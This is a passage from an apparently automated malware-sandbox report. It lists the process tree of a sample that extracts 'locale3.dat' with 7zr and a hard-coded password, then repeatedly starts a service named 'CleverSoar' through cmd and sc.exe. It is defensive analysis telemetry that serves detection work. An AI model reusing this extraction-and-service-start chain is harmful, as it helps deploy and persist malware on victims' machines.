                              Antivirus matches:
                              • Detection: 0%, ReversingLabs
                              Reputation:low
                              Has exited:true

                              Target ID:11
                              Start time:23:07:04
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff66e660000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:12
                              Start time:23:07:05
                              Start date:22/12/2024
                              Path:C:\Program Files (x86)\Windows NT\7zr.exe
                              Wow64 process (32bit):true
                              Commandline:7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
                              Imagebase:0x460000
                              File size:831'200 bytes
                              MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:low
                              Has exited:true

                              Target ID:13
                              Start time:23:07:05
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff66e660000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:14
                              Start time:23:07:05
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff639d20000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:15
                              Start time:23:07:05
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff6aba10000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:16
                              Start time:23:07:05
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff639d20000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:17
                              Start time:23:07:05
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff66e660000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:18
                              Start time:23:07:05
                              Start date:22/12/2024
                              Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                              Imagebase:0x7ff717f30000
                              File size:496'640 bytes
                              MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                              Has elevated privileges:true
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Has exited:false

                              Target ID:19
                              Start time:23:07:05
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff6aba10000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:20
                              Start time:23:07:05
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff66e660000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:21
                              Start time:23:07:05
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff639d20000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:22
                              Start time:23:07:05
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff6aba10000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:23
                              Start time:23:07:05
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff66e660000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:24
                              Start time:23:07:06
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff639d20000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:25
                              Start time:23:07:06
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff6aba10000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:26
                              Start time:23:07:06
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff66e660000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:27
                              Start time:23:07:06
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff639d20000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:28
                              Start time:23:07:06
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff6aba10000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:29
                              Start time:23:07:06
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff66e660000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:30
                              Start time:23:07:06
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff639d20000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:31
                              Start time:23:07:06
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff6aba10000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:32
                              Start time:23:07:06
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff66e660000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:33
                              Start time:23:07:06
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff639d20000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:34
                              Start time:23:07:06
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff6aba10000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:35
                              Start time:23:07:06
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff66e660000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:36
                              Start time:23:07:06
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff639d20000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:37
                              Start time:23:07:06
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff6aba10000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:38
                              Start time:23:07:06
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff66e660000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:39
                              Start time:23:07:06
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff639d20000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:40
                              Start time:23:07:06
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff6aba10000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:41
                              Start time:23:07:07
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff66e660000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:42
                              Start time:23:07:07
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff639d20000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:43
                              Start time:23:07:07
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff6aba10000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:44
                              Start time:23:07:07
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff66e660000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:45
                              Start time:23:07:07
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff639d20000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:46
                              Start time:23:07:07
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff6aba10000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:47
                              Start time:23:07:07
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff66e660000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:48
                              Start time:23:07:07
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff639d20000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:49
                              Start time:23:07:07
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff6aba10000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:50
                              Start time:23:07:07
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff66e660000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:51
                              Start time:23:07:07
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff639d20000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:52
                              Start time:23:07:07
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff6aba10000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:53
                              Start time:23:07:07
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff66e660000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:54
                              Start time:23:07:07
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff639d20000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:55
                              Start time:23:07:07
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff6aba10000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:56
                              Start time:23:07:07
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff66e660000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:57
                              Start time:23:07:07
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff639d20000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:58
                              Start time:23:07:07
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff6aba10000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:59
                              Start time:23:07:07
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff66e660000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:60
                              Start time:23:07:08
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff7403e0000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:61
                              Start time:23:07:08
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff6aba10000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:62
                              Start time:23:07:08
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff66e660000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:63
                              Start time:23:07:08
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff639d20000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:64
                              Start time:23:07:08
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff6aba10000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:65
                              Start time:23:07:08
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff66e660000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:66
                              Start time:23:07:08
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff639d20000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:67
                              Start time:23:07:08
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff6aba10000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:68
                              Start time:23:07:08
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff66e660000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:69
                              Start time:23:07:08
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff639d20000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:70
                              Start time:23:07:08
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff6aba10000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:71
                              Start time:23:07:08
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff66e660000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:72
                              Start time:23:07:08
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff639d20000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:73
                              Start time:23:07:08
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff6aba10000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:74
                              Start time:23:07:08
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff66e660000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:75
                              Start time:23:07:09
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff639d20000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:76
                              Start time:23:07:09
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff6aba10000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:77
                              Start time:23:07:09
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff66e660000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:78
                              Start time:23:07:09
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff639d20000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:79
                              Start time:23:07:09
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff6aba10000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:80
                              Start time:23:07:09
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff66e660000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
